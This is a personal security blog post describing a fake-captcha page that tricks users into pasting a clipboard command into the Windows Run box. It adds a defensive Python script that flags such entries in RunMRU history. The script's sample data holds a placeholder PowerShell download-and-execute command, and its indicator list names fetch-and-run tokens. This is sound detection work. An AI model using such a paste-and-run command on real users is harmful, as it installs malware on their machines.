Hack Utilizes Organic Component

If a hacker can’t hack the system, he’ll hack the organic component, otherwise known as the user. In this case, the email in which the link was found wasn’t actually malicious, so I won’t post it here. It was a legitimate email linking to a site that happened to have been compromised and used to spread malware. The way it tried to spread malware is the part I find interesting.

I’m not going to try to hide the URL in question, but later attempts to examine the malicious site failed, which tells me it was likely fixed relatively quickly.

Upon visiting the site, I was shown a captcha page that looked different than any other captcha I’ve seen:

Note the steps it provides, instructing the user on how to pass the verification. The first step is to hold the Windows key and press the letter ‘R’. This brings up the Windows “Run” box. The next step is to press Ctrl-V, which is the keyboard shortcut to paste. Doing so pastes a command into the Run box to pull down code from a website.

When I tried this, nothing displayed on the screen and Any.Run only detected the test as “Suspicious”. This tells me nothing was likely actually pulled down from the site. Further testing after this provided no additional information, as it appears the compromise was resolved. Still, I find the way the site attempted the hack very interesting, in addition to how the site automatically placed the script into the workstation’s clipboard. I wonder if anyone fell for it before it was taken down.
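One place a defender can check whether anyone on a workstation actually followed those Win+R / Ctrl-V steps is the Run box history, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The script below is an added example of mine, not code from the post or the compromised site: it parses a constructed export of that key (the entry text and the placeholder URL are made up to match the shape of the technique) and flags entries that look like a paste-and-run download command.

```python
import re

# Constructed sample of a RunMRU key export. Windows stores each Run-box entry
# in a single-letter value with a literal "\1" appended, and keeps the
# most-recent-first order in MRUList. The powershell entry is a placeholder
# shaped like the pasted command described above, not the real one.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "mstsc\\1",
    "c": "powershell -w hidden -c \"iwr http://EXAMPLE-PLACEHOLDER/x | iex\"\\1",
}

# Indicators of a Run-box entry that fetches and executes remote code.
SUSPICIOUS = [
    r"\bpowershell\b", r"\bpwsh\b", r"\bmshta\b", r"\bcmd\b.*\bcurl\b",
    r"\biwr\b", r"invoke-webrequest", r"invoke-expression", r"\biex\b",
    r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden\b", r"https?://",
]


def parse_run_mru(values):
    """Return Run-box commands in most-recent-first order, "\\1" suffix stripped."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def flag_suspicious(commands):
    """Return (command, matched_indicators) for every entry hitting an indicator."""
    hits = []
    for cmd in commands:
        matched = [p for p in SUSPICIOUS if re.search(p, cmd, re.IGNORECASE)]
        if matched:
            hits.append((cmd, matched))
    return hits


if __name__ == "__main__":
    for cmd, why in flag_suspicious(parse_run_mru(SAMPLE_RUNMRU)):
        print(f"SUSPICIOUS Run entry: {cmd!r}  (matched: {', '.join(why)})")
```

On a live Windows host the same dict can be built by enumerating that key with the standard winreg module; the sample here is embedded so the check runs offline.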

–Matt
